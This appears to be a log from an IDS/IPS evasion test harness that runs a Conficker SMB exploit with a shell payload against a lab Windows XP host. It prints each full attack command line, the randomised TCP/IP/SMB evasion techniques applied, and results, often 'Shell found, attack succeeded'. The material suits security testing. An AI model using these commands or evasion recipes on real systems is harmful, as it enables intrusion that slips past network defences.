- The following evasions are applied from stage netbios_connect to msrpc_req:
- - 25% probability to add a random alphanumeric urgent data byte to a TCP segment.
- The following evasions are applied from stage smb_openpipe to msrpc_req:
- - IPv4 fragments with at most 32 bytes per fragment
- Info: NetBIOS connection 10.62.90.114:63893 -> 10.35.1.207:445
- Terminated
- ..........
- 3999 runs averaging 1.91 runs / second ; progress: 2097/43200............
- 4011 runs averaging 1.91 runs / second ; progress: 2102/43200.................
- 4028 runs averaging 1.91 runs / second ; progress: 2107/43200.............
- 4041 runs averaging 1.91 runs / second ; progress: 2112/43200....
- 4045 runs averaging 1.91 runs / second ; progress: 2117/43200
- 4045 runs averaging 1.91 runs / second ; progress: 2122/43200...
- 4048 runs averaging 1.90 runs / second ; progress: 2127/43200...............
- 4063 runs averaging 1.91 runs / second ; progress: 2132/43200..........
- 4073 runs averaging 1.91 runs / second ; progress: 2137/43200.2015-06-07 23:55:08 INFO
- Success. (10.62.90.112):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.112 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=13755 --extra=bindport=10002 --verifydelay=200 --obfuscate --randseed=UGUgfnLSS3I --evasion=[msrpc_req,end]smb_chaff,"3","write_flag","rand" --evasion=[msrpc_bind,msrpc_req]smb_writeandxpad,"10","zero" --evasion=[netbios_connect,end]tcp_paws,"25%","9","alpharandomized" --verifydelay=1000 --payload=shell
- Info: Using random seed UGUgfnLSS3J
- The following evasions are applied from stage netbios_connect to end:
- - 25% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 9> and has original payload with alphabetic bytes randomized
- The following evasions are applied from stage msrpc_bind to msrpc_req:
- - 10 bytes of padding is inserted into WriteAndX messages between the SMB header and payload. The padding consists of zero bytes.
- The following evasions are applied from stage msrpc_req to end:
- - Before every 3th SMB message an SMB chaff message is sent. The chaff is a WriteAndX message with a broken write mode flag, and has random payload
- Info: NetBIOS connection 10.62.90.112:13755 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: Shell closed
- 0: Success.
- ........
- 4083 runs averaging 1.91 runs / second ; progress: 2142/43200.....
- 4088 runs averaging 1.90 runs / second ; progress: 2147/43200.....
- 4093 runs averaging 1.90 runs / second ; progress: 2152/43200......
- 4099 runs averaging 1.90 runs / second ; progress: 2157/43200...........
- 4110 runs averaging 1.90 runs / second ; progress: 2162/43200..Pid 28656 timed out - killed
- 2015-06-07 23:55:34 INFO
- Timed out (10.62.90.115):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.115 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=40200 --extra=bindport=10005 --verifydelay=200 --obfuscate --randseed=Psu0DJsbrY8 --evasion=[msrpc_bind,msrpc_req]tcp_chaff,"75%","chksum|nullchksum|nullflag|shorthdr","random" --evasion=[smb_openpipe,msrpc_req]tcp_urgent,"25%","random_alphanum" --verifydelay=1000 --payload=shell
- Info: Using random seed Psu0DJsbrY8
- The following evasions are applied from stage smb_openpipe to msrpc_req:
- - 25% probability to add a random alphanumeric urgent data byte to a TCP segment.
- The following evasions are applied from stage msrpc_bind to msrpc_req:
- - 75% probability to send TCP chaff when sending a TCP packet. The chaff packet has:
- * Invalid TCP checksum.
- * NULL TCP checksum.
- * NULL TCP control flags.
- * TCP header shorter than 20 bytes
- * Duplicate packet has random bytes as payload
- Info: NetBIOS connection 10.62.90.115:40200 -> 10.35.1.207:445
- Terminated
- ....2015-06-07 23:55:37 INFO
- Success. (10.62.90.116):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.116 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=18364 --extra=bindport=10006 --verifydelay=200 --obfuscate --randseed=0UFzFvAvo1k --evasion=[smb_connect,end]tcp_paws,"5","268435455","shuffle" --evasion=[smb_opentree,end]tcp_paws,"1","7","alphanumrandomized" --verifydelay=1000 --payload=shell
- Info: Using random seed 0UFzFvAvo1n
- The following evasions are applied from stage smb_connect to end:
- - Every 5th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 268435455> and has shuffled original payload
- The following evasions are applied from stage smb_opentree to end:
- - Every 1th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 7> and has original payload with alphanumeric bytes randomized
- Info: NetBIOS connection 10.62.90.116:18364 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: Shell closed
- 0: Success.
- 4118 runs averaging 1.90 runs / second ; progress: 2167/43200.........
- 4127 runs averaging 1.90 runs / second ; progress: 2172/43200..............
- 4141 runs averaging 1.90 runs / second ; progress: 2178/43200..Pid 28876 timed out - killed
- 2015-06-07 23:55:48 INFO
- Timed out (10.62.90.117):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.117 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=50364 --extra=bindport=10007 --verifydelay=200 --obfuscate --randseed=Qd7YC0/440M --evasion=[start,netbios_connect]ipv4_opt,"2","inc","zero" --evasion=[smb_openpipe,msrpc_req]tcp_urgent,"1","random_alpha" --verifydelay=1000 --payload=shell
- Info: Using random seed Qd7YC0/440N
- The following evasions are applied from stage start to netbios_connect:
- - Every 2th IPv4 packet is duplicated and an incrementing DWORD is added to the options field.
- The duplicate packet has NULL bytes for payload
- The following evasions are applied from stage smb_openpipe to msrpc_req:
- - Add a random alphaurgent data byte to every 1 TCP segment.
- Info: NetBIOS connection 10.62.90.117:50364 -> 10.35.1.207:445
- Terminated
- ........Pid 28942 timed out - killed
- 2015-06-07 23:55:51 INFO
- Timed out (10.62.90.111):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.111 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=57424 --extra=bindport=10001 --verifydelay=200 --obfuscate --randseed=C0OcLkrMnfY --evasion=[start,end]ipv4_frag,"56" --evasion=[msrpc_bind,end]tcp_overlap,"717","new","zero" --evasion=[smb_opentree,msrpc_bind]tcp_urgent,"2","random_alphanum" --verifydelay=1000 --payload=shell
- Info: Using random seed C0OcLkrMnfY
- - IPv4 fragments with at most 56 bytes per fragment
- The following evasions are applied from stage smb_opentree to msrpc_bind:
- - Add a random alphanumeric urgent data byte to every 2 TCP segment.
- The following evasions are applied from stage msrpc_bind to end:
- - TCP segments are set to overlap by 717 bytes, with the later packet containing the correct payload. Overlapping part has 0x00 bytes as payload
- Info: NetBIOS connection 10.62.90.111:57424 -> 10.35.1.207:445
- Terminated
- 4154 runs averaging 1.90 runs / second ; progress: 2183/43200...........
- 4165 runs averaging 1.90 runs / second ; progress: 2188/43200.2015-06-07 23:55:58 INFO
- Success. (10.62.90.111):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.111 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=61300 --extra=bindport=10001 --verifydelay=200 --obfuscate --randseed=IvJxSTiwIlk --evasion=[msrpc_bind,end]ipv4_opt,"1","inc","shuffletcp" --evasion=[smb_connect,end]tcp_paws,"75%","268435453","shuffle" --verifydelay=1000 --payload=shell
- Info: Using random seed IvJxSTiwIlk
- The following evasions are applied from stage smb_connect to end:
- - 75% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 268435453> and has shuffled original payload
- The following evasions are applied from stage msrpc_bind to end:
- - Every 1th IPv4 packet is duplicated and an incrementing DWORD is added to the options field.
- The duplicate packet has shuffled TCP payload
- Info: NetBIOS connection 10.62.90.111:61300 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: Shell closed
- 0: Success.
- 4175 runs averaging 1.90 runs / second ; progress: 2193/43200.................
- 4192 runs averaging 1.91 runs / second ; progress: 2198/43200.....................
- 4213 runs averaging 1.91 runs / second ; progress: 2203/43200.........
- 4222 runs averaging 1.91 runs / second ; progress: 2208/43200.....
- 4227 runs averaging 1.91 runs / second ; progress: 2213/43200..2015-06-07 23:56:24 INFO
- Success. (10.62.90.116):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.116 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=21077 --extra=bindport=10006 --verifydelay=200 --obfuscate --randseed=r+UXSHT7fyw --evasion=[smb_connect,msrpc_bind]smb_chaff,"5","write_flag","zero" --evasion=[msrpc_bind,msrpc_req]smb_decoytrees,"7","7","8","random_msrpcbind" --verifydelay=1000 --payload=shell
- Info: Using random seed r+UXSHT7fyy
- The following evasions are applied from stage smb_connect to msrpc_bind:
- - Before every 5th SMB message an SMB chaff message is sent. The chaff is a WriteAndX message with a broken write mode flag, and has zeroes for payload
- The following evasions are applied from stage msrpc_bind to msrpc_req:
- - Before normal SMB writes, 7 SMB trees are opened and 7 writes are performed to them. The write payload is 8 bytes of MSRPC bind-like data.
- Info: NetBIOS connection 10.62.90.116:21077 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: CommandShell::SendCommand() - Failed to send string
- Info: Command shell connection reset.
- Info: Shell closed
- 0: Success.
- 4238 runs averaging 1.91 runs / second ; progress: 2218/43200.....
- 4243 runs averaging 1.91 runs / second ; progress: 2223/43200...........
- 4254 runs averaging 1.91 runs / second ; progress: 2228/43200.....
- 4259 runs averaging 1.91 runs / second ; progress: 2233/43200..................
- 4277 runs averaging 1.91 runs / second ; progress: 2238/43200...............
- 4292 runs averaging 1.91 runs / second ; progress: 2243/43200..........
- 4302 runs averaging 1.91 runs / second ; progress: 2248/43200...........
- 4313 runs averaging 1.91 runs / second ; progress: 2253/43200.............
- 4326 runs averaging 1.92 runs / second ; progress: 2258/43200................
- 4342 runs averaging 1.92 runs / second ; progress: 2263/43200.......
- 4349 runs averaging 1.92 runs / second ; progress: 2268/43200....
- 4353 runs averaging 1.92 runs / second ; progress: 2273/43200.........
- 4362 runs averaging 1.91 runs / second ; progress: 2278/43200........
- 4370 runs averaging 1.91 runs / second ; progress: 2283/432002015-06-07 23:57:33 INFO
- Success. (10.62.90.115):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.115 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=55850 --extra=bindport=10005 --verifydelay=200 --obfuscate --randseed=XzJN6u3j/GI --evasion=[start,smb_openpipe]ipv4_frag,"1464" --evasion=[start,smb_connect]ipv4_order,"lastfirst" --evasion=[netbios_connect,end]tcp_paws,"3","8","shuffle" --verifydelay=1000 --payload=shell
- Info: Using random seed XzJN6u3j/GJ
- The following evasions are applied from stage start to smb_openpipe:
- - IPv4 fragments with at most 1464 bytes per fragment
- The following evasions are applied from stage start to smb_connect:
- - IPv4 fragments are sent in correct order except that the last fragment comes first
- The following evasions are applied from stage netbios_connect to end:
- - Every 3th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 8> and has shuffled original payload
- Info: NetBIOS connection 10.62.90.115:55850 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: Shell closed
- 0: Success.
- 4372 runs averaging 1.91 runs / second ; progress: 2288/43200
- 4372 runs averaging 1.91 runs / second ; progress: 2293/43200..
- 4374 runs averaging 1.90 runs / second ; progress: 2298/43200.........
- 4383 runs averaging 1.90 runs / second ; progress: 2303/43200Pid 30126 timed out - killed
- 2015-06-07 23:57:54 INFO
- Timed out (10.62.90.110):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.110 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=32027 --extra=bindport=10000 --verifydelay=200 --obfuscate --randseed=wUBn/BV2FEU --evasion=[smb_connect,end]smb_chaff,"21","write_flag","zero" --evasion=[start,smb_connect]tcp_paws,"21","120695731","random_alphanum" --evasion=[smb_openpipe,msrpc_req]tcp_urgent,"75%","random" --verifydelay=1000 --payload=shell
- Info: Using random seed wUBn/BV2FEX
- The following evasions are applied from stage start to smb_connect:
- - Every 21th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 120695731> and has random alphanumeric bytes as payload
- The following evasions are applied from stage smb_connect to end:
- - Before every 21th SMB message an SMB chaff message is sent. The chaff is a WriteAndX message with a broken write mode flag, and has zeroes for payload
- The following evasions are applied from stage smb_openpipe to msrpc_req:
- - 75% probability to add a random urgent data byte to a TCP segment.
- Info: NetBIOS connection 10.62.90.110:32027 -> 10.35.1.207:445
- Terminated
- 4389 runs averaging 1.90 runs / second ; progress: 2308/43200....
- 4393 runs averaging 1.90 runs / second ; progress: 2313/43200......
- 4399 runs averaging 1.90 runs / second ; progress: 2318/43200.........
- 4408 runs averaging 1.90 runs / second ; progress: 2323/43200....2015-06-07 23:58:17 INFO
- Success. (10.62.90.116):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.116 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=34566 --extra=bindport=10006 --verifydelay=200 --obfuscate --randseed=Hhd5F+J7AnY --evasion=[smb_opentree,msrpc_bind]ipv4_frag,"832" --evasion=[msrpc_bind,end]smb_decoytrees,"6","1","7","random_msrpcreq" --verifydelay=1000 --payload=shell
- Info: Using random seed Hhd5F+J7AnY
- The following evasions are applied from stage smb_opentree to msrpc_bind:
- - IPv4 fragments with at most 832 bytes per fragment
- The following evasions are applied from stage msrpc_bind to end:
- - Before normal SMB writes, 6 SMB trees are opened and 1 writes are performed to them. The write payload is 7 bytes of MSRPC request-like data.
- Info: NetBIOS connection 10.62.90.116:34566 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: Command shell connection reset.
- Info: CommandShell::SendCommand() - Failed to send string
- Info: Shell closed
- 0: Success.
- 4415 runs averaging 1.90 runs / second ; progress: 2328/43200.......
- 4422 runs averaging 1.90 runs / second ; progress: 2333/43200..........
- 4432 runs averaging 1.90 runs / second ; progress: 2338/43200............
- 4444 runs averaging 1.90 runs / second ; progress: 2343/43200.........
- 4453 runs averaging 1.90 runs / second ; progress: 2348/43200..........
- 4463 runs averaging 1.90 runs / second ; progress: 2353/43200.......Pid 31109 timed out - killed
- 2015-06-07 23:58:47 INFO
- Timed out (10.62.90.113):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.113 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=37344 --extra=bindport=10003 --verifydelay=200 --obfuscate --randseed=FvSgjVWqTCk --evasion=[netbios_connect,smb_openpipe]ipv4_frag,"48" --evasion=[netbios_connect,smb_openpipe]tcp_paws,"25%","6","shuffle" --evasion=[smb_opentree,msrpc_req]tcp_urgent,"2","random_alpha" --verifydelay=1000 --payload=shell
- Info: Using random seed FvSgjVWqTCk
- The following evasions are applied from stage netbios_connect to smb_openpipe:
- - IPv4 fragments with at most 48 bytes per fragment
- - 25% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 6> and has shuffled original payload
- The following evasions are applied from stage smb_opentree to msrpc_req:
- - Add a random alphaurgent data byte to every 2 TCP segment.
- Info: NetBIOS connection 10.62.90.113:37344 -> 10.35.1.207:445
- Terminated
- 4478 runs averaging 1.90 runs / second ; progress: 2358/43200......Pid 31179 timed out - killed
- 2015-06-07 23:58:50 INFO
- Timed out (10.62.90.119):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.119 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=19295 --extra=bindport=10009 --verifydelay=200 --obfuscate --randseed=Kz3v1sEnRX8 --evasion=[smb_connect,msrpc_req]tcp_segvar,"6","62790" --evasion=[smb_opentree,end]tcp_urgent,"2","random_alphanum" --verifydelay=1000 --payload=shell
- Info: Using random seed Kz3v1sEnRX8
- The following evasions are applied from stage smb_connect to msrpc_req:
- - TCP packets are segmented to contain between 6 and 62790 bytes of payload.
- The following evasions are applied from stage smb_opentree to end:
- - Add a random alphanumeric urgent data byte to every 2 TCP segment.
- Info: NetBIOS connection 10.62.90.119:19295 -> 10.35.1.207:445
- Terminated
- 4503 runs averaging 1.91 runs / second ; progress: 2363/43200............
- 4515 runs averaging 1.91 runs / second ; progress: 2369/43200......
- 4521 runs averaging 1.90 runs / second ; progress: 2374/43200......
- 4527 runs averaging 1.90 runs / second ; progress: 2379/43200.............2015-06-07 23:59:12 INFO
- Success. (10.62.90.110):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.110 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=30148 --extra=bindport=10000 --verifydelay=200 --obfuscate --randseed=jbJwefC+liw --evasion=[netbios_connect,smb_connect]ipv4_opt,"3","inc","shuffletcp" --evasion=[smb_openpipe,msrpc_req]tcp_paws,"50%","8","shuffle" --verifydelay=1000 --payload=shell
- Info: Using random seed jbJwefC+liy
- The following evasions are applied from stage netbios_connect to smb_connect:
- - Every 3th IPv4 packet is duplicated and an incrementing DWORD is added to the options field.
- The duplicate packet has shuffled TCP payload
- The following evasions are applied from stage smb_openpipe to msrpc_req:
- - 50% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 8> and has shuffled original payload
- Info: NetBIOS connection 10.62.90.110:30148 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: Shell closed
- 0: Success.
- 4544 runs averaging 1.91 runs / second ; progress: 2384/43200........2015-06-07 23:59:17 INFO
- Success. (10.62.90.113):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.113 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=63960 --extra=bindport=10003 --verifydelay=200 --obfuscate --randseed=j+EzmmWE6BM --evasion=[smb_opentree,end]tcp_paws,"25%","9","random" --evasion=[msrpc_bind,msrpc_req]tcp_urgent,"13","random_alpha" --verifydelay=1000 --payload=shell
- Info: Using random seed j+EzmmWE6BO
- The following evasions are applied from stage smb_opentree to end:
- - 25% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 9> and has random bytes as payload
- The following evasions are applied from stage msrpc_bind to msrpc_req:
- - Add a random alphaurgent data byte to every 13 TCP segment.
- Info: NetBIOS connection 10.62.90.113:63960 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: Shell closed
- 0: Success.
- 4557 runs averaging 1.91 runs / second ; progress: 2389/43200.........
- 4566 runs averaging 1.91 runs / second ; progress: 2394/43200.................
- 4583 runs averaging 1.91 runs / second ; progress: 2399/432002015-06-07 23:59:29 INFO
- Success. (10.62.90.115):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.115 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=18737 --extra=bindport=10005 --verifydelay=200 --obfuscate --randseed=o6dhAFDy5Zs --evasion=[smb_connect,end]smb_decoytrees,"5","6","2","random_msrpcreq" --evasion=[start,end]tcp_inittsopt,"enable","zero" --verifydelay=1000 --payload=shell
- Info: Using random seed o6dhAFDy5Zu
- - TCP timestamps enabled, initial TCP timestamp is set to normal ( ie. taken from the timestamp clock ).
- The following evasions are applied from stage smb_connect to end:
- - Before normal SMB writes, 5 SMB trees are opened and 6 writes are performed to them. The write payload is 2 bytes of MSRPC request-like data.
- Info: NetBIOS connection 10.62.90.115:18737 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: CommandShell::SendCommand() - Failed to send string
- Info: Command shell connection reset.
- Info: Shell closed
- 0: Success.
- 4600 runs averaging 1.91 runs / second ; progress: 2404/43200.........
- 4609 runs averaging 1.91 runs / second ; progress: 2409/43200.
- 4610 runs averaging 1.91 runs / second ; progress: 2414/43200.2015-06-07 23:59:45 INFO
- Success. (10.62.90.115):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.115 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=23455 --extra=bindport=10005 --verifydelay=200 --obfuscate --randseed=FVDJtPsNgvo --evasion=[start,smb_openpipe]tcp_chaff,"1","chksum|nullflag|outofwindow|shorthdr","random_alpha" --evasion=[start,end]tcp_paws,"50%","6","alpharandomized" --verifydelay=1000 --payload=shell
- Info: Using random seed FVDJtPsNgvo
- - 50% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 6> and has original payload with alphabetic bytes randomized
- The following evasions are applied from stage start to smb_openpipe:
- - With every 1 TCP packet a TCP chaff packet is sent. The chaff packet has:
- * Invalid TCP checksum.
- * NULL TCP control flags.
- * An out-of-window sequence number.
- * TCP header shorter than 20 bytes
- * Duplicate packet has random alpha bytes as payload
- Info: NetBIOS connection 10.62.90.115:23455 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: Shell closed
- 0: Success.
- 4618 runs averaging 1.91 runs / second ; progress: 2419/43200......
- 4624 runs averaging 1.91 runs / second ; progress: 2424/432002015-06-07 23:59:54 INFO
- Success. (10.62.90.110):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.110 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=62608 --extra=bindport=10000 --verifydelay=200 --obfuscate --randseed=jagl4e+Cocw --evasion=[netbios_connect,end]ipv4_frag,"48" --evasion=[start,msrpc_bind]ipv4_order,"rand" --evasion=[smb_openpipe,end]tcp_paws,"1","7","random_alpha" --verifydelay=1000 --payload=shell
- Info: Using random seed jagl4e+Cocy
- The following evasions are applied from stage start to msrpc_bind:
- - IPv4 fragments are sent in a random order
- The following evasions are applied from stage netbios_connect to end:
- - IPv4 fragments with at most 48 bytes per fragment
- The following evasions are applied from stage smb_openpipe to end:
- - Every 1th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 7> and has random alpha bytes as payload
- Info: NetBIOS connection 10.62.90.110:62608 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: Shell closed
- 0: Success.
- 4635 runs averaging 1.91 runs / second ; progress: 2429/43200..........
- 4645 runs averaging 1.91 runs / second ; progress: 2434/43200.Pid 32240 timed out - killed
- 2015-06-08 00:00:04 INFO
- Timed out (10.62.90.118):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.118 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=47969 --extra=bindport=10008 --verifydelay=200 --obfuscate --randseed=tp+FrT9yypg --evasion=[smb_openpipe,msrpc_bind]ipv4_frag,"1408" --evasion=[smb_connect,end]tcp_urgent,"25%","random_alpha" --verifydelay=1000 --payload=shell
- Info: Using random seed tp+FrT9yypi
- The following evasions are applied from stage smb_connect to end:
- - 25% probability to add a random alphaurgent data byte to a TCP segment.
- The following evasions are applied from stage smb_openpipe to msrpc_bind:
- - IPv4 fragments with at most 1408 bytes per fragment
- Info: NetBIOS connection 10.62.90.118:47969 -> 10.35.1.207:445
- Terminated
- 4663 runs averaging 1.91 runs / second ; progress: 2439/43200..........
- 4673 runs averaging 1.91 runs / second ; progress: 2444/43200.........
- 4682 runs averaging 1.91 runs / second ; progress: 2449/43200...........Pid 32520 timed out - killed
- 2015-06-08 00:00:24 INFO
- Timed out (10.62.90.114):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.114 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=40937 --extra=bindport=10004 --verifydelay=200 --obfuscate --randseed=2UySA8bJYfo --evasion=[netbios_connect,smb_openpipe]tcp_chaff,"75%","nullchksum|nullflag|shorthdr|longhdr","alphanumrandomized" --evasion=[smb_opentree,end]tcp_urgent,"2","random_alphanum" --verifydelay=1000 --payload=shell
- Info: Using random seed 2UySA8bJYfr
- The following evasions are applied from stage netbios_connect to smb_openpipe:
- - 75% probability to send TCP chaff when sending a TCP packet. The chaff packet has:
- * NULL TCP checksum.
- * NULL TCP control flags.
- * TCP header shorter than 20 bytes
- * TCP header longer than packet total size
- * Duplicate packet has original payload with alphanumeric bytes randomized
- The following evasions are applied from stage smb_opentree to end:
- - Add a random alphanumeric urgent data byte to every 2 TCP segment.
- Info: NetBIOS connection 10.62.90.114:40937 -> 10.35.1.207:445
- Terminated
- 4694 runs averaging 1.91 runs / second ; progress: 2454/43200........................
- 4718 runs averaging 1.92 runs / second ; progress: 2459/43200......2015-06-08 00:00:31 INFO
- Success. (10.62.90.113):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.113 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=33922 --extra=bindport=10003 --verifydelay=200 --obfuscate --randseed=ftL7lBQo1h0 --evasion=[smb_connect,smb_opentree]smb_decoytrees,"2","4","652","random" --evasion=[smb_opentree,msrpc_bind]smb_decoytrees,"4","3","2047","random" --evasion=[start,end]tcp_paws,"75%","268435453","random_alphanum" --verifydelay=1000 --payload=shell
- Info: Using random seed ftL7lBQo1h1
- - 75% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 268435453> and has random alphanumeric bytes as payload
- The following evasions are applied from stage smb_connect to smb_opentree:
- - Before normal SMB writes, 2 SMB trees are opened and 4 writes are performed to them. The write payload is 652 random bytes.
- The following evasions are applied from stage smb_opentree to msrpc_bind:
- - Before normal SMB writes, 4 SMB trees are opened and 3 writes are performed to them. The write payload is 2047 random bytes.
- Info: NetBIOS connection 10.62.90.113:33922 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: Shell closed
- 0: Success.
- 4736 runs averaging 1.92 runs / second ; progress: 2464/43200........2015-06-08 00:00:37 INFO
- Success. (10.62.90.110):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.110 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=15508 --extra=bindport=10000 --verifydelay=200 --obfuscate --randseed=UyQ9/Q7tcpQ --evasion=[smb_opentree,msrpc_req]ipv4_opt,"2","inc","unmodified" --evasion=[msrpc_bind,msrpc_req]smb_writeandxpad,"219","random_alphanum" --evasion=[smb_connect,msrpc_req]tcp_paws,"1","72760242","alpharandomized" --verifydelay=1000 --payload=shell
- Info: Using random seed UyQ9/Q7tcpR
- The following evasions are applied from stage smb_connect to msrpc_req:
- - Every 1th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 72760242> and has original payload with alphabetic bytes randomized
- The following evasions are applied from stage smb_opentree to msrpc_req:
- - Every 2th IPv4 packet is duplicated and an incrementing DWORD is added to the options field.
- The duplicate packet has identical payload
- The following evasions are applied from stage msrpc_bind to msrpc_req:
- - 219 bytes of padding is inserted into WriteAndX messages between the SMB header and payload. The padding consists of random alphanumeric bytes.
- Info: NetBIOS connection 10.62.90.110:15508 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: Shell closed
- 0: Success.
- 4748 runs averaging 1.92 runs / second ; progress: 2469/43200...........
- 4759 runs averaging 1.92 runs / second ; progress: 2474/432002015-06-08 00:00:45 INFO
- Success. (10.62.90.115):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.115 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=19812 --extra=bindport=10005 --verifydelay=200 --obfuscate --randseed=APidMQF+mvg --evasion=[msrpc_bind,msrpc_req]smb_chaff,"50%","write_flag","rand" --evasion=[netbios_connect,msrpc_req]tcp_paws,"75%","159953442","shuffle" --verifydelay=1000 --payload=shell
- Info: Using random seed APidMQF+mvg
